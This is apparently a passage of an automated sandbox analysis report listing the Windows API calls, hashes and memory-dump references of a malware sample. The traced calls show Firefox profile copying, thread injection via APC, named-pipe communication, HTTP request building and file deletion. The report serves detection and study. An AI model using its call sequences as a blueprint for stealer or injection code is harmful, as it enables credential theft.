    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
